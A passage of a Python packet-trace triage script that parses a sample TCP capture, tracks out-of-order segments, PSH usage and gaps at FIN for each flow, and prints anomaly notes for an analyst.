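20:39:29.944 IP 192.0.2.10.2333 > 198.51.100.20.80: S [tcp sum ok] 1000:1000(0) win 64240 (DF)
20:39:30.179 IP 192.0.2.10.2333 > 198.51.100.20.80: . [tcp sum ok] 0:1460(1460) ack 1 win 64240 (DF)
20:39:30.219 IP 192.0.2.10.2333 > 198.51.100.20.80: . [tcp sum ok] 1460:2920(1460) ack 1 win 64240 (DF)
20:39:30.333 IP 192.0.2.10.2333 > 198.51.100.20.80: . [tcp sum ok] 4380:5840(1460) ack 1 win 64240 (DF)
20:39:30.377 IP 192.0.2.10.2333 > 198.51.100.20.80: . [tcp sum ok] 2920:4380(1460) ack 1 win 64240 (DF)
20:39:30.427 IP 192.0.2.10.2333 > 198.51.100.20.80: F [tcp sum ok] 8724:8724(0) ack 1 win 64240 (DF)
20:39:30.655 IP 192.0.2.10.2333 > 198.51.100.20.80: . [tcp sum ok] 5840:7300(1460) ack 1 win 64240 (DF)
20:39:30.704 IP 192.0.2.10.2333 > 198.51.100.20.80: P [tcp sum ok] 7300:8724(1424) ack 1 win 64240 (DF)
"""


def contiguous_end(intervals):
    """Highest sequence number reachable from the first byte without a gap."""
    if not intervals:
        return None
    ordered = sorted(intervals)
    end = ordered[0][0]
    for start, stop in ordered:
        if start > end:
            break
        end = max(end, stop)
    return end


def analyze(lines):
    """Return {(src, dst): report} for each one-directional flow in `lines`."""
    flows, state = {}, {}
    for line in lines:
        m = SEG.search(line)
        if not m:
            continue
        src, dst, flags = m.group(1), m.group(2), m.group(3)
        start, end, length = (int(g) for g in m.group(4, 5, 6))
        if "S" in flags:
            continue  # SYN lines carry absolute sequence numbers; skip them
        rep = flows.setdefault((src, dst), {
            "total_bytes": 0, "late_segments": 0, "psh_segments": 0,
            "bytes_before_first_psh": None, "fin_seq": None, "missing_at_fin": 0})
        st = state.setdefault((src, dst), {"intervals": [], "highest": 0})
        if length:
            if "P" in flags:
                rep["psh_segments"] += 1
                if rep["bytes_before_first_psh"] is None:
                    rep["bytes_before_first_psh"] = rep["total_bytes"]
            if start < st["highest"]:
                rep["late_segments"] += 1  # arrived after later data
            st["highest"] = max(st["highest"], end)
            st["intervals"].append((start, end))
            rep["total_bytes"] += length  # retransmissions would be counted twice
        if "F" in flags and rep["fin_seq"] is None:
            rep["fin_seq"] = end
            seen = contiguous_end(st["intervals"])
            rep["missing_at_fin"] = 0 if seen is None else max(0, end - seen)
    return flows


def triage_notes(report, no_psh_limit=4096):
    """Observations for an analyst. no_psh_limit is an assumed threshold."""
    notes = []
    before = report["bytes_before_first_psh"]
    if before is None:
        before = report["total_bytes"]
    if before > no_psh_limit:
        notes.append(f"{before} bytes sent before the first PSH")
    if report["missing_at_fin"] > 0:
        # Can also be caused by reordering on the path or by capture loss.
        notes.append(f"FIN seen with {report['missing_at_fin']} bytes still outstanding")
    return notes


if __name__ == "__main__":
    for flow, rep in analyze(SAMPLE.splitlines()).items():
        print(flow, rep, triage_notes(rep))
```
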


